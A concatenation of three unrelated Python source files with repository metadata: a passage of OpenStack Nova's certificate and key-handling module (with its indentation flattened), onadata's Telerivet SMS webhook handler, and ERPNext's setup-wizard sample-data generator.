serialization.load_ssh_public_key(
pub_bytes, backends.default_backend())
pub_data = base64.b64decode(public_key.split(' ')[1])
digest = hashes.Hash(hashes.MD5(), backends.default_backend())
digest.update(pub_data)
md5hash = digest.finalize()
raw_fp = binascii.hexlify(md5hash)
if six.PY3:
raw_fp = raw_fp.decode('ascii')
return ':'.join(a + b for a, b in zip(raw_fp[::2], raw_fp[1::2]))
except Exception:
raise exception.InvalidKeypair(
reason=_('failed to generate fingerprint'))
def generate_x509_fingerprint(pem_key):
try:
if isinstance(pem_key, six.text_type):
pem_key = pem_key.encode('utf-8')
cert = x509.load_pem_x509_certificate(
pem_key, backends.default_backend())
raw_fp = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
if six.PY3:
raw_fp = raw_fp.decode('ascii')
return ':'.join(a + b for a, b in zip(raw_fp[::2], raw_fp[1::2]))
except (ValueError, TypeError, binascii.Error) as ex:
raise exception.InvalidKeypair(
reason=_('failed to generate X509 fingerprint. '
'Error message: %s') % ex)
def generate_key_pair(bits=2048):
key = paramiko.RSAKey.generate(bits)
keyout = six.StringIO()
key.write_private_key(keyout)
private_key = keyout.getvalue()
public_key = '%s %s Generated-by-Nova' % (key.get_name(), key.get_base64())
fingerprint = generate_fingerprint(public_key)
return (private_key, public_key, fingerprint)
def fetch_crl(project_id):
"""Get crl file for project."""
if not CONF.use_project_ca:
project_id = None
crl_file_path = crl_path(project_id)
if not os.path.exists(crl_file_path):
raise exception.CryptoCRLFileNotFound(project=project_id)
with open(crl_file_path, 'r') as crlfile:
return crlfile.read()
def decrypt_text(project_id, text):
private_key_file = key_path(project_id)
if not os.path.exists(private_key_file):
raise exception.ProjectNotFound(project_id=project_id)
with open(private_key_file, 'rb') as f:
data = f.read()
try:
priv_key = serialization.load_pem_private_key(
data, None, backends.default_backend())
return priv_key.decrypt(text, padding.PKCS1v15())
except (ValueError, TypeError, exceptions.UnsupportedAlgorithm) as exc:
raise exception.DecryptionFailure(reason=six.text_type(exc))
def ssh_encrypt_text(ssh_public_key, text):
"""Encrypt text with an ssh public key.
If text is a Unicode string, encode it to UTF-8.
"""
if isinstance(text, six.text_type):
text = text.encode('utf-8')
try:
pub_bytes = ssh_public_key.encode('utf-8')
pub_key = serialization.load_ssh_public_key(
pub_bytes, backends.default_backend())
return pub_key.encrypt(text, padding.PKCS1v15())
except Exception as exc:
raise exception.EncryptionFailure(reason=six.text_type(exc))
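# Illustrative usage (not part of the original module): encrypt a short secret
# with a freshly generated key pair from generate_key_pair() above. Decrypting
# it again would require the matching private key and is omitted here.
def _example_ssh_encrypt():
    _private_key, public_key, _fingerprint = generate_key_pair(bits=2048)
    return ssh_encrypt_text(public_key, 'dummy-admin-password')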
def revoke_cert(project_id, file_name):
"""Revoke a cert by file name."""
try:
# NOTE(vish): potential race condition here
utils.execute('openssl', 'ca', '-config', './openssl.cnf', '-revoke',
file_name, cwd=ca_folder(project_id))
utils.execute('openssl', 'ca', '-gencrl', '-config', './openssl.cnf',
'-out', CONF.crl_file, cwd=ca_folder(project_id))
except OSError:
raise exception.ProjectNotFound(project_id=project_id)
except processutils.ProcessExecutionError:
raise exception.RevokeCertFailure(project_id=project_id)
def revoke_certs_by_user(user_id):
"""Revoke all user certs."""
admin = context.get_admin_context()
for cert in db.certificate_get_all_by_user(admin, user_id):
revoke_cert(cert['project_id'], cert['file_name'])
def revoke_certs_by_project(project_id):
"""Revoke all project certs."""
# NOTE(vish): This is somewhat useless because we can just shut down
# the vpn.
admin = context.get_admin_context()
for cert in db.certificate_get_all_by_project(admin, project_id):
revoke_cert(cert['project_id'], cert['file_name'])
def revoke_certs_by_user_and_project(user_id, project_id):
"""Revoke certs for user in project."""
admin = context.get_admin_context()
for cert in db.certificate_get_all_by_user_and_project(admin,
user_id, project_id):
revoke_cert(cert['project_id'], cert['file_name'])
def _project_cert_subject(project_id):
"""Helper to generate user cert subject."""
return CONF.project_cert_subject % (project_id, timeutils.isotime())
def _user_cert_subject(user_id, project_id):
"""Helper to generate user cert subject."""
return CONF.user_cert_subject % (project_id, user_id, timeutils.isotime())
def generate_x509_cert(user_id, project_id, bits=2048):
"""Generate and sign a cert for user in project."""
subject = _user_cert_subject(user_id, project_id)
with utils.tempdir() as tmpdir:
keyfile = os.path.abspath(os.path.join(tmpdir, 'temp.key'))
csrfile = os.path.abspath(os.path.join(tmpdir, 'temp.csr'))
utils.execute('openssl', 'genrsa', '-out', keyfile, str(bits))
utils.execute('openssl', 'req', '-new', '-key', keyfile, '-out',
csrfile, '-batch', '-subj', subject)
with open(keyfile) as f:
private_key = f.read()
with open(csrfile) as f:
csr = f.read()
(serial, signed_csr) = sign_csr(csr, project_id)
fname = os.path.join(ca_folder(project_id), 'newcerts/%s.pem' % serial)
cert = {'user_id': user_id,
'project_id': project_id,
'file_name': fname}
db.certificate_create(context.get_admin_context(), cert)
return (private_key, signed_csr)
def generate_winrm_x509_cert(user_id, bits=2048):
"""Generate a cert for passwordless auth for user in project."""
subject = '/CN=%s' % user_id
upn = '%s@localhost' % user_id
with utils.tempdir() as tmpdir:
keyfile = os.path.abspath(os.path.join(tmpdir, 'temp.key'))
conffile = os.path.abspath(os.path.join(tmpdir, 'temp.conf'))
_create_x509_openssl_config(conffile, upn)
(certificate, _err) = utils.execute(
'openssl', 'req', '-x509', '-nodes', '-days', '3650',
'-config', conffile, '-newkey', 'rsa:%s' % bits,
'-outform', 'PEM', '-keyout', keyfile, '-subj', subject,
'-extensions', 'v3_req_client',
binary=True)
(out, _err) = utils.execute('openssl', 'pkcs12', '-export',
'-inkey', keyfile, '-password', 'pass:',
process_input=certificate,
binary=True)
private_key = base64.b64encode(out)
fingerprint = generate_x509_fingerprint(certificate)
if six.PY3:
private_key = private_key.decode('ascii')
certificate = certificate.decode('utf-8')
return (private_key, certificate, fingerprint)
def _create_x509_openssl_config(conffile, upn):
content = ("distinguished_name = req_distinguished_name\n"
"[req_distinguished_name]\n"
"[v3_req_client]\n"
"extendedKeyUsage = clientAuth\n"
"subjectAltName = otherName:""1.3.6.1.4.1.311.20.2.3;UTF8:%s\n")
with open(conffile, 'w') as file:
file.write(content % upn)
def _ensure_project_folder(project_id):
if not os.path.exists(ca_path(project_id)):
geninter_sh_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), 'CA', 'geninter.sh'))
utils.execute('sh', geninter_sh_path, project_id,
_project_cert_subject(project_id), cwd=ca_folder())
def generate_vpn_files(project_id):
project_folder = ca_folder(project_id)
key_fn = os.path.join(project_folder, 'server.key')
crt_fn = os.path.join(project_folder, 'server.crt')
if os.path.exists(crt_fn):
return
# NOTE(vish): The 2048 is to maintain compatibility with the old script.
# We are using "project-vpn" as the user_id for the cert
# even though that user may not really exist. Ultimately
# this will be changed to be launched by a real user. At
# that point we will can delete this helper method.
key, csr = generate_x509_cert('project-vpn', project_id, 2048)
with open(key_fn, 'w') as keyfile:
keyfile.write(key)
with open(crt_fn, 'w') as crtfile:
crtfile.write(csr)
def sign_csr(csr_text, project_id=None):
if not CONF.use_project_ca:
project_id = None
if not project_id:
return _sign_csr(csr_text, ca_folder())
_ensure_project_folder(project_id)
return _sign_csr(csr_text, ca_folder(project_id))
def _sign_csr(csr_text, ca_folder):
with utils.tempdir() as tmpdir:
inbound = os.path.join(tmpdir, 'inbound.csr')
outbound = os.path.join(tmpdir, 'outbound.csr')
try:
with open(inbound, 'w') as csrfile:
csrfile.write(csr_text)
except IOError:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Failed to write inbound.csr'))
LOG.debug('Flags path: %s', ca_folder)
# Change working dir to CA
fileutils.ensure_tree(ca_folder)
utils.execute('openssl', 'ca', '-batch', '-out', outbound, '-config',
'./openssl.cnf', '-infiles', inbound, cwd=ca_folder)
out, _err = utils.execute('openssl', 'x509', '-in', outbound,
'-serial', '-noout', cwd=ca_folder)
serial = out.rpartition('=')[2].strip()
with open(outbound, 'r') as crtfile:
return (serial, crtfile.read())
| apache-2.0 | -945,007,648,203,035,300 | 36.017949 | 79 | 0.619935 | false |
eHealthAfrica/onadata | onadata/apps/sms_support/providers/telerivet.py | 2 | 3908 | """ Telerivet WebHook gateway
Supports Receiving and replying SMS from/to Telerivet Service
See: http://telerivet.com/help/api/webhook/receiving """
import json
import datetime
from django.http import HttpResponse
from django.core.urlresolvers import reverse
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from django.utils.translation import ugettext as _
from onadata.apps.sms_support.tools import SMS_API_ERROR,\
SMS_SUBMISSION_ACCEPTED
from onadata.apps.sms_support.parser import process_incoming_smses
def autodoc(url_root, username, id_string):
urla = url_root + reverse('sms_submission_api',
kwargs={'username': username,
'service': 'telerivet'})
urlb = url_root + reverse('sms_submission_form_api',
kwargs={'username': username,
'id_string': id_string,
'service': 'telerivet'})
doc = (u'<p>' +
_(u"%(service)s Instructions:")
% {'service': u'<a href="https://telerivet.com">'
u'Telerivet\'s Webhook API</a>'}
+ u'</p><ol><li>' +
_(u"Sign in to Telerivet.com and go to Service Page.")
+ u'</li><li>' +
_(u"Follow instructions to add an application with either URL:")
+ u'<br /><span class="sms_autodoc_example">%(urla)s'
+ u'<br />%(urlb)s</span><br />'
+ u'</li></ol><p>' +
_(u"That's it. Now Send an SMS Formhub submission to your Telerivet"
u" phone number. It will create a submission on Formhub.")
+ u'</p>') % {'urla': urla, 'urlb': urlb}
return doc
def get_response(data):
message = data.get('text')
if data.get('code') == SMS_API_ERROR:
message = None
elif data.get('code') != SMS_SUBMISSION_ACCEPTED:
message = _(u"[ERROR] %s") % message
response = {}
if message:
response.update({"messages": [{"content": message}]})
return HttpResponse(json.dumps(response), mimetype='application/json')
@require_POST
@csrf_exempt
def import_submission(request, username):
""" Proxy to import_submission_for_form with None as id_string """
return import_submission_for_form(request, username, None)
@require_POST
@csrf_exempt
def import_submission_for_form(request, username, id_string):
""" Retrieve and process submission from SMSSync Request """
sms_identity = request.POST.get('from_number', '').strip()
sms_text = request.POST.get('content', '').strip()
now_timestamp = datetime.datetime.now().strftime('%s')
sent_timestamp = request.POST.get('time_created', now_timestamp).strip()
try:
sms_time = datetime.datetime.fromtimestamp(float(sent_timestamp))
except ValueError:
sms_time = datetime.datetime.now()
return process_message_for_telerivet(username=username,
sms_identity=sms_identity,
sms_text=sms_text,
sms_time=sms_time,
id_string=id_string)
def process_message_for_telerivet(username,
sms_identity, sms_text, sms_time, id_string):
""" Process a text instance and return in SMSSync expected format """
if not sms_identity or not sms_text:
return get_response({'code': SMS_API_ERROR,
'text': _(u"`identity` and `message` are "
u"both required and must not be "
u"empty.")})
incomings = [(sms_identity, sms_text)]
response = process_incoming_smses(username, incomings, id_string)[-1]
return get_response(response)
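# Illustrative payload (not part of the original module): the POST fields that
# import_submission_for_form() reads from Telerivet's webhook request. The
# values below are made up; the text format itself is whatever
# process_incoming_smses() expects for the target form.
def _example_webhook_post_data():
    return {
        'from_number': '+15551234567',
        'content': 'survey yes 27',
        'time_created': '1414411890',
    }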
| bsd-2-clause | 6,995,010,597,197,296,000 | 36.576923 | 79 | 0.577021 | false |
ebukoz/thrive | erpnext/setup/setup_wizard/operations/sample_data.py | 9 | 4547 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils.make_random import add_random_children
import frappe.utils
import random, os, json
from frappe import _
def make_sample_data(domains, make_dependent = False):
"""Create a few opportunities, quotes, material requests, issues, todos, projects
to help the user get started"""
if make_dependent:
items = frappe.get_all("Item", {'is_sales_item': 1})
customers = frappe.get_all("Customer")
warehouses = frappe.get_all("Warehouse")
if items and customers:
for i in range(3):
customer = random.choice(customers).name
make_opportunity(items, customer)
make_quote(items, customer)
if items and warehouses:
make_material_request(frappe.get_all("Item"))
make_projects(domains)
import_notification()
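# Illustrative usage (assumption, not part of the original module): the setup
# wizard would call something like make_sample_data(['Education']) or
# make_sample_data(['Education'], make_dependent=True) once Items, Customers
# and Warehouses have been created.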
def make_opportunity(items, customer):
b = frappe.get_doc({
"doctype": "Opportunity",
"opportunity_from": "Customer",
"customer": customer,
"opportunity_type": _("Sales"),
"with_items": 1
})
add_random_children(b, "items", rows=len(items), randomize = {
"qty": (1, 5),
"item_code": ["Item"]
}, unique="item_code")
b.insert(ignore_permissions=True)
b.add_comment('Comment', text="This is a dummy record")
def make_quote(items, customer):
qtn = frappe.get_doc({
"doctype": "Quotation",
"quotation_to": "Customer",
"party_name": customer,
"order_type": "Sales"
})
add_random_children(qtn, "items", rows=len(items), randomize = {
"qty": (1, 5),
"item_code": ["Item"]
}, unique="item_code")
qtn.insert(ignore_permissions=True)
qtn.add_comment('Comment', text="This is a dummy record")
def make_material_request(items):
for i in items:
mr = frappe.get_doc({
"doctype": "Material Request",
"material_request_type": "Purchase",
"schedule_date": frappe.utils.add_days(frappe.utils.nowdate(), 7),
"items": [{
"schedule_date": frappe.utils.add_days(frappe.utils.nowdate(), 7),
"item_code": i.name,
"qty": 10
}]
})
mr.insert()
mr.submit()
mr.add_comment('Comment', text="This is a dummy record")
def make_issue():
pass
def make_projects(domains):
current_date = frappe.utils.nowdate()
project = frappe.get_doc({
"doctype": "Project",
"project_name": "ERPNext Implementation",
})
tasks = [
{
"title": "Explore ERPNext",
"start_date": current_date,
"end_date": current_date,
"file": "explore.md"
}]
if 'Education' in domains:
tasks += [
{
"title": _("Setup your Institute in ERPNext"),
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 1),
"file": "education_masters.md"
},
{
"title": "Setup Master Data",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 1),
"file": "education_masters.md"
}]
else:
tasks += [
{
"title": "Setup Your Company",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 1),
"file": "masters.md"
},
{
"title": "Start Tracking your Sales",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 2),
"file": "sales.md"
},
{
"title": "Start Managing Purchases",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 3),
"file": "purchase.md"
},
{
"title": "Import Data",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 4),
"file": "import_data.md"
},
{
"title": "Go Live!",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 5),
"file": "go_live.md"
}]
for t in tasks:
with open (os.path.join(os.path.dirname(__file__), "tasks", t['file'])) as f:
t['description'] = frappe.utils.md_to_html(f.read())
del t['file']
project.append('tasks', t)
project.insert(ignore_permissions=True)
def import_notification():
'''Import notification for task start'''
with open (os.path.join(os.path.dirname(__file__), "tasks/task_alert.json")) as f:
notification = frappe.get_doc(json.loads(f.read())[0])
notification.insert()
# trigger the first message!
from frappe.email.doctype.notification.notification import trigger_daily_alerts
trigger_daily_alerts()
def test_sample():
frappe.db.sql('delete from `tabNotification`')
frappe.db.sql('delete from tabProject')
frappe.db.sql('delete from tabTask')
make_projects('Education')
import_notification() | gpl-3.0 | 4,250,881,906,569,239,600 | 24.840909 | 83 | 0.653398 | false |